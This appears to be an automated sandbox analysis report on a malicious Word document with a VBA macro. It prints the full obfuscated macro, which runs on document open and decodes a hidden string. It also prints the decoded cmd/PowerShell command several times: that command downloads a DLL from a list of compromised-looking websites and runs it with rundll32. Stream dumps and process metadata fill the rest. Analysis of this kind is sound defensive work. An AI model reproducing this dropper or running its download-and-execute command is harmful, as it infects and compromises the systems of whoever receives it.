Dim s1, ra As String: Dim bfik3uvgikuds As Double
Dim dvfghwkuibisdbgfiw As Object
Dim d, R As Double
For bkwefiusdif = 1 To 10
If bkwefiusdif = 7 Then
dvfghwkuibisdbgfiw.CreateObject(goh4iahwodegiyna89deyfni("WRIsRIcRIriRIpt.RISRIheRIlRIl", "RI"), "").Run fhokl34rhyw5uwegea, 0
Else
If bkwefiusdif = 3 Then
Set dvfghwkuibisdbgfiw = CreateObject(goh4iahwodegiyna89deyfni("fARDfAS.fADafAtafASpfAacfAe", "fA"))
Dim fs As Integer: If bfik3uvgikuds < 0.021335 And bfik3uvgikuds > -0.0134542765 Then fhokl34rhyw5uwegea = goh4iahwodegiyna89deyfni(fbhqwieusiyeoiwugeig, "elf")
End If
End If
Next
If d <> 0.123456 Then
ra = Replace(s1, ",", "")
End If
End Sub
Private Function dfjolirhoghwow(ByVal filename$, Optional ByVal name$ = "") As String
    On Error Resume Next: Err.Clear: Const BYTES_PER_ROW& = 480
    Dim F_Content$
    ff& = FreeFile: Open filename$ For Binary Access Read As #ff
    fs& = LOF(ff): txt$ = String(fs&, Chr(0))
    Get #ff, , txt$: Close #ff
    F_Content$ = F_Content$ & "&" & name$ & "&" & vbNewLine
    F_Content$ = F_Content$ & "" & vbNewLine
    For i = 1 To Len(txt$)
        R& = Asc(Mid(txt, i, 1))
        res$ = res$ & IIf(Len(Hex(R)) = 1, "0", "") & Hex(R)
        If i Mod BYTES_PER_ROW& = 0 Then
            F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
            res = "": DoEvents
        End If
    Next
    If Len(res) Then F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
    F_Content$ = F_Content$ & "" & vbNewLine
    FileToVBAFunction = F_Content$
End Function
Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
fjow3efyw98efhasdokfhlnkvawofh3 0, 0, "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\""." & "Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj": End Sub

      Streams

      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 519
      General
      Stream Path:PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:519
      Entropy:5.27637957879
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = c v b k u 3 g a k u i s d g f i l u 3 g b l a w / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 6 4 4 E A B 6 7 6 B A B 8 B E B 8 B E B C C 2 B C C 2 " . .
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41
      Stream Path: PROJECTwm, File Type: data, Stream Size: 77
      General
      Stream Path:PROJECTwm
      File Type:data
      Stream Size:77
      Entropy:3.2550852567
      Base64 Encoded:False
      Data ASCII:c v b k u 3 g a k u i s d g f i l u 3 g b l a w . c . v . b . k . u . 3 . g . a . k . u . i . s . d . g . f . i . l . u . 3 . g . b . l . a . w . . . . .
      Data Raw:63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 00 63 00 76 00 62 00 6b 00 75 00 33 00 67 00 61 00 6b 00 75 00 69 00 73 00 64 00 67 00 66 00 69 00 6c 00 75 00 33 00 67 00 62 00 6c 00 61 00 77 00 00 00 00 00
      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4731
      General
      Stream Path:VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4731
      Entropy:4.84395391101
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
      Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
      Stream Path: VBA/dir, File Type: data, Stream Size: 843
      General
      Stream Path:VBA/dir
      File Type:data
      Stream Size:843
      Entropy:6.51963251442
      Base64 Encoded:True
      Data ASCII:. G . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . i . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
      Data Raw:01 47 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 1a 69 8e 63 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

      Network Behavior

      No network behavior found

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: WINWORD.EXE PID: 1220 Parent PID: 596

      General

      Start time:13:15:18
      Start date:22/11/2021
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f820000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: cmd.exe PID: 2420 Parent PID: 1220

      General

      Start time:13:15:23
      Start date:22/11/2021
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      Imagebase:0x4ace0000
      File size:345088 bytes
      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: powershell.exe PID: 2776 Parent PID: 2420

      General

      Start time:13:15:24
      Start date:22/11/2021
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      Imagebase:0x13ff00000
      File size:473600 bytes
      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:high

      Chronological Activities

      Disassembly

      Code Analysis

      VBA Code

      Call Graph

      Graph

      Module: cvbku3gakuisdgfilu3gblaw

      Declaration
      LineContent
      1

      Attribute VB_Name = "cvbku3gakuisdgfilu3gblaw"

      2

      Attribute VB_Base = "1Normal.ThisDocument"

      3

      Attribute VB_GlobalNameSpace = False

      4

      Attribute VB_Creatable = False

      5

      Attribute VB_PredeclaredId = True

      6

      Attribute VB_Exposed = True

      7

      Attribute VB_TemplateDerived = True

      8

      Attribute VB_Customizable = True

      Executed Functions
      Subroutine fjow3efyw98efhasdokfhlnkvawofh3, APIs: 7, Strings: 23, Number of lines: 23, Relevance: 76.023
      APIsMeta Information

      Run

      		Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

      CreateObject

      		CreateObject("RDS.DataSpace")

      Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: Replace

      Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: MsgBox

      Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: Replace

      Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: MsgBox

      Replace

      		Replace(,",","")
      StringsDecrypted Strings
      """"
      "RI"
      "WRIsRIcRIriRIpt.RISRIheRIlRIl"
      "elf"
      "fA"
      "fARDfAS.fADafAtafASpfAacfAe"
      """"
      "RI"
      "WRIsRIcRIriRIpt.RISRIheRIlRIl"
      """"
      "RI"
      "WRIsRIcRIriRIpt.RISRIheRIlRIl"
      "elf"
      "fA"
      "fARDfAS.fADafAtafASpfAacfAe"
      "fA"
      "fARDfAS.fADafAtafASpfAacfAe"
      "elf"
      "elf"
      """"
      ","
      """"
      ","
      LineInstructionMeta Information
      69

      Sub fjow3efyw98efhasdokfhlnkvawofh3(nart4kuagiuagsaedr54 as Long, bvagh4iauhoshetret as Long, fbhqwieusiyeoiwugeig as String)

      69

      Dim sdgbvku3giqugfi2, fhokl34rhyw5uwegea, hkqwfsadesf as String

      executed
      70

      Dim s1, ra as String

      70

      Dim bfik3uvgikuds as Double

      71

      Dim dvfghwkuibisdbgfiw as Object

      72

      Dim d, R as Double

      73

      For bkwefiusdif = 1 To 10

      74

      If bkwefiusdif = 7 Then

      75

      dvfghwkuibisdbgfiw.CreateObject(goh4iahwodegiyna89deyfni("WRIsRIcRIriRIpt.RISRIheRIlRIl", "RI"), "").Run fhokl34rhyw5uwegea, 0

      Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

      executed
      76

      Else

      77

      If bkwefiusdif = 3 Then

      78

      Set dvfghwkuibisdbgfiw = CreateObject(goh4iahwodegiyna89deyfni("fARDfAS.fADafAtafASpfAacfAe", "fA"))

      CreateObject("RDS.DataSpace")

      executed
      79

      Dim fs as Integer

      79

      If bfik3uvgikuds < 0.021335 And bfik3uvgikuds > - 0.0134542765 Then

      79

      fhokl34rhyw5uwegea = goh4iahwodegiyna89deyfni(fbhqwieusiyeoiwugeig, "elf")

      79

      Endif

      80

      Endif

      81

      Endif

      82

      Next

      83

      If d <> 0.123456 Then

      84

      ra = Replace(s1, ",", "")

      Replace(,",","")

      executed
      85

      Endif

      86

      End Sub

      Subroutine Document_Open, APIs: 3, Strings: 1, Number of lines: 4, Relevance: 8.754
      APIsMeta Information

      Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: Run

      Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: CreateObject

      Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: Replace

      StringsDecrypted Strings
      "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\"".""Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj"
      LineInstructionMeta Information
      107

      Private Sub Document_Open()

      107

      Dim gzjohestiha4otihsdoa8ef as String

      executed
      108

      fjow3efyw98efhasdokfhlnkvawofh3 0, 0, "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\""." & "Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj"

      109

      End Sub

      Function goh4iahwodegiyna89deyfni, APIs: 2, Strings: 4, Number of lines: 12, Relevance: 15.762
      APIsMeta Information

      Replace

      		Replace("fARDfAS.fADafAtafASpfAacfAe","fA","") -> RDS.DataSpace Replace("celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj="$selftrs=\"helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\".Selfplelfit(\",\");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\"celf:elf\pelfroelfgraelfmdelfatelfa\\\"+elf$relf1+\".delflelfl\";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\"celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\";$aelf=$telfpelfth+\",felf\"+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};";IelfEelfX $delffkj","elf","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj Replace("WRIsRIcRIriRIpt.RISRIheRIlRIl","RI","") -> Wscript.Shell

      MsgBox

      StringsDecrypted Strings
      """"
      ","
      ","
      ","
      LineInstructionMeta Information
      37

      Function goh4iahwodegiyna89deyfni(fhi3hof3hfolk as String, dfh3olhuiefoiasihkl as String) as String

      38

      Dim cbuay7aygsikjbkv as Integer

      executed
      39

      Dim fjoq3wihrpoa8fghoashf as String

      39

      cbuay7aygsikjbkv = 10

      39

      fjoq3wihrpoa8fghoashf = Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "")

      Replace("fARDfAS.fADafAtafASpfAacfAe","fA","") -> RDS.DataSpace

      executed
      40

      For sgdyuiwuygiasb = 1 To cbuay7aygsikjbkv

      41

      If sgdyuiwuygiasb > 20 Then

      42

      MsgBox ","

      MsgBox

      43

      Endif

      44

      Next

      45

      goh4iahwodegiyna89deyfni = fjoq3wihrpoa8fghoashf

      46

      End Function

      Non-Executed Functions
      Function dfjolirhoghwow, APIs: 26, Strings: 3, Number of lines: 28, Relevance: 43.528
      APIsMeta Information

      Clear

      FreeFile

      Open

      ff

      LOF

      ff

      String

      Chr

      ff

      ff

      vbNewLine

      vbNewLine

      Len

      Asc

      Mid

      txt

      IIf

      Len

      Hex

      R

      BYTES_PER_ROW&

      vbNewLine

      DoEvents

      Len

      vbNewLine

      vbNewLine

      StringsDecrypted Strings
      """"
      """"
      """"
      LineInstructionMeta Information
      87

      Private Function dfjolirhoghwow(ByVal filename$, optional ByVal name$ = "") as String

      88

      On Error Resume Next

      88

      Err.Clear

      Clear

      88

      Const BYTES_PER_ROW = 480

      89

      Dim F_Content as String

      90

      ff& = FreeFile

      FreeFile

      90

      Open filename$ For Binary Access Read As # ff

      Open

      ff

      91

      fs& = LOF(ff)

      LOF

      ff

      91

      txt$ = String(fs&, Chr(0))

      String

      Chr

      92

      Get # ff, , txt$

      ff

      92

      Close # ff

      ff

      93

      F_Content$ = F_Content$ & "&" & name$ & "&" & vbNewLine

      vbNewLine

      94

      F_Content$ = F_Content$ & "" & vbNewLine

      vbNewLine

      95

      For i = 1 To Len(txt$)

      Len

      96

      R& = Asc(Mid(txt, i, 1))

      Asc

      Mid

      txt

      97

      res$ = res$ & IIf(Len(Hex(R)) = 1, "0", "") & Hex(R)

      IIf

      Len

      Hex

      R

      98

      If i Mod BYTES_PER_ROW& = 0 Then

      BYTES_PER_ROW&

      99

      F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine

      vbNewLine

      100

      res = ""

      100

      DoEvents

      DoEvents

      101

      Endif

      102

      Next

      Len

      103

      If Len(res) Then

      Len

      103

      F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine

      vbNewLine

      103

      Endif

      104

      F_Content$ = F_Content$ & "" & vbNewLine

      vbNewLine

      105

      FileToVBAFunction = F_Content$

      106

      End Function

      Function gajowisjd90asdilkf, APIs: 21, Strings: 6, Number of lines: 26, Relevance: 40.526
      APIsMeta Information

      Collection

      Workbooks

      name

      ThisWorkbook

      Windows

      name

      Add

      CStr

      name

      Count

      MsgBox

      vbCritical

      Workbooks

      Count

      vbTab

      vbNewLine

      vbNewLine

      InputBox

      IsNumeric

      Workbooks

      Val

      StringsDecrypted Strings
      "&"
      ","
      ","
      ","
      "&"
      ","
      LineInstructionMeta Information
      47

      Function gajowisjd90asdilkf() as Object

      48

      On Error Resume Next

      49

      Dim coll as New Collection, WB as Workbook

      Collection

      50

      For Each WB in Workbooks

      Workbooks

      51

      If WB.name <> ThisWorkbook.name Then

      name

      ThisWorkbook

      52

      If Windows(WB.name).Visible Then

      Windows

      name

      52

      coll.Add CStr(WB.name)

      Add

      CStr

      name

      52

      Endif

      53

      Endif

      54

      Next WB

      Workbooks

      55

      Select Case coll.Count

      Count

      56

      Case 0

      57

      MsgBox ",", vbCritical, ","

      MsgBox

      vbCritical

      58

      Case 1

      59

      Set GetAnotherWorkbook = Workbooks(coll(1))

      Workbooks

      60

      Case Else

      61

      For i = 1 To coll.Count

      Count

      62

      txt = txt & i & vbTab & coll(i) & vbNewLine

      vbTab

      vbNewLine

      63

      Next i

      Count

      64

      msg = "&" & vbNewLine & vbNewLine & txt

      vbNewLine

      65

      res = InputBox(msg, ",", 1)

      InputBox

      66

      If IsNumeric(res) Then

      IsNumeric

      66

      Set GetAnotherWorkbook = Workbooks(coll(Val(res)))

      Workbooks

      Val

      66

      Endif

      67

      End Select

      Count

      68

      End Function

      Subroutine fbkaw4lkuwgbtlske, APIs: 7, Strings: 4, Number of lines: 11, Relevance: 16.511
      APIsMeta Information

      GetAnotherWorkbook

      MsgBox

      FullName

      vbInformation

      MsgBox

      vbCritical

      Range

      StringsDecrypted Strings
      "&"
      "&"
      ","
      "a2"
      LineInstructionMeta Information
      27

      Sub fbkaw4lkuwgbtlske()

      28

      Dim WB as Workbook

      29

      Set WB = GetAnotherWorkbook

      GetAnotherWorkbook

      30

      If Not WB Is Nothing Then

      31

      MsgBox "&" & WB.FullName, vbInformation

      MsgBox

      FullName

      vbInformation

      32

      Else

      33

      MsgBox ",", vbCritical

      MsgBox

      vbCritical

      33

      Exit Sub

      34

      Endif

      35

      x = WB.Worksheets(1).Range("a2")

      Range

      36

      End Sub

      Subroutine sfoliq3hwoqihepolfijp, APIs: 5, Strings: 3, Number of lines: 7, Relevance: 12.007
      APIsMeta Information

      GetFolderPath

      Path

      ThisWorkbook

      MsgBox

      vbInformation

      StringsDecrypted Strings
      ","
      """"
      ":"
      LineInstructionMeta Information
      18

      Sub sfoliq3hwoqihepolfijp()

      19

      gjpo4jaiwledkgls = GetFolderPath(",", ThisWorkbook.Path)

      GetFolderPath

      Path

      ThisWorkbook

      20

      If gjpo4jaiwledkgls = "" Then

      20

      Exit Sub

      20

      Endif

      21

      MsgBox ":" & gjpo4jaiwledkgls, vbInformation

      MsgBox

      vbInformation

      22

      End Sub

